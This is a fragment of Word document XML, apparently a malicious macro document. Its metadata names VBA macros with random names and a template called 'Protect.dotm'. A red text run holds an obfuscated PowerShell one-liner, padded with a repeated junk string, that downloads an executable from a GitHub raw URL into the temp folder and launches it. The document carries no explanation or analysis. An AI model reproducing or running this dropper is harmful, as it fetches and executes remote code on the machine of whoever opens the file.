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19CA" w:rsidRDefault="000E19CA" w:rsidP="001B6EA5">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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95231" w:rsidRDefault="00095231" w:rsidP="004C2DC7">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F64881" w:rsidRPr="002C6962" w:rsidRDefault="004C2DC7" w:rsidP="004C2DC7">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C2DC7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>muibwedvccdpmuibwedvccdowmuibwedvccdemuibwedvccdrshmuibwedvccdemuibwedvccdlmuibwedvccdl.muibwedvccdexmuibwedvccde $cmuibwedvccdlmuibwedvccdimuibwedvccdmuibwedvccdemuibwedvccdnmuibwedvccdt = nmuibwedvccdmuibwedvccdew-objmuibwedvccdmuibwedvccdectmuibwedvccd Smuibwedvccdystmuibwedvccdemmuibwedvccd.Nmuibwedvccdemuibwedvccdt.WmuibwedvccdemuibwedvccdbmuibwedvccdClimuibwedvccdmuibwedvccdenmuibwedvccdt;$muibwedvccdmuibwedvccdamuibwedvccd = 'hmuibwedvccdtmuibwedvccdtpmuibwedvccdsmuibwedvccd:muibwedvccd/muibwedvccd/muibwedvccdgithmuibwedvccdub.muibwedvccdcomuibwedvccdm/EaglmuibwedvccdeEye-muibwedvccdEvalumuibwedvccdationmuibwedvccd/Emuibwedvccdxecutmuibwedvccdable_Emuibwedvccdxplormuibwedvccdation/rmuibwedvccdaw/mamuibwedvccdster/muibwedvccdSymuibwedvccdstemuibwedvccdmmuibwedvccdHomuibwedvccdsmuibwedvccdt.muibwedvccdexmuibwedvccde'.Split(',');$muibwedvccdhmuibwedvccdumuibwedvccdmuibwedvccdamuibwedvccdsmuibwedvccd = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C2DC7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>muibwedvccdenv:tmuibwedvccdemp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C2DC7">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> + '\csbhmuibwedvccdg.muibwedvccdexmuibwedvccde';fmuibwedvccdomuibwedvccdrmuibwedvccdmuibwedvccdemuibwedvccdmuibwedvccdamuibwedvccdcmuibwedvccdh($muibwedvccdbmuibwedvccd in $muibwedvccdmuibwedvccdamuibwedvccd){muibwedvccdtmuibwedvccdrmuibwedvccdy{$cmuibwedvccdlmuibwedvccdimuibwedvccdmuibwedvccdemuibwedvccdnmuibwedvccdt.DowmuibwedvccdnlmuibwedvccdomuibwedvccdadmuibwedvccdFimuibwedvccdlmuibwedvccde($muibwedvccdbmuibwedvccd.TomuibwedvccdStmuibwedvccdrimuibwedvccdng(), $muibwedvccdhmuibwedvccdumuibwedvccdmuibwedvccdamuibwedvccdsmuibwedvccd);muibwedvccdImuibwedvccdnmuibwedvccdvmuibwedvccdomuibwedvccdkmuibwedvccdmuibwedvccde-muibwedvccdImuibwedvccdtmuibwedvccdmuibwedvccdemuibwedvccdm($muibwedvccdhmuibwedvccdumuibwedvccdmuibwedvccdamuibwedvccdsmuibwedvccd);bmuibwedvccdrmuibwedvccdmuibwedvccdemuibwedvccdmuibwedvccdamuibwedvccdk;muibwedvccd}cmuibwedvccdmuibwedvccdamuibwedvccdtmuibwedvccdcmuibwedvccdhmuibwedvccd{wmuibwedvccdrmuibwedvccditmuibwedvccdmuibwedvccde-hmuibwedvccdomuibwedvccdst $_muibwedvccd.Emuibwedvccdxmuibwedvccdcmuibwedvccdmuibwedvccdemuibwedvccdptmuibwedvccdiomuibwedvccdnmuibwedvccd.Mmuibwedvccdmuibwedvccdemuibwedvccdssmuibwedvccdmuibwedvccdagmuibwedvccdmuibwedvccde}muibwedvccd}muibwedvccd;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F64881" w:rsidRPr="002C6962" w:rsidSect="008A79EF">
      <w:pgSz w:w="18720" w:h="8640" w:orient="landscape" w:code="1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881"/>
    <w:rsid w:val="00090D58"/>
    <w:rsid w:val="00095231"/>
    <w:rsid w:val="000E19CA"/>
    <w:rsid w:val="0014480B"/>
    <w:rsid w:val="001B6EA5"/>
    <w:rsid w:val="002C6962"/>
    <w:rsid w:val="00392A69"/>
    <w:rsid w:val="004C2DC7"/>
    <w:rsid w:val="00590D0C"/>
    <w:rsid w:val="008332BC"/>
    <w:rsid w:val="008A79EF"/>
    <w:rsid w:val="00F37D14"/>
    <w:rsid w:val="00F64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KJNKHBYFV.APPLYUNIFORMBORDERSTOALLTABLES" wne:name="Project.KJNkhbyfv.ApplyUniformBordersToAllTables" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.YPGNNODE.BQONTTULV" wne:name="Project.ypgNnOde.bqOnTtUL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Protect.dotm</Template>
  <TotalTime>1</TotalTime>
  <Pages>5</Pages>
  <Words>336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Win10</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-26T13:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-26T13:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>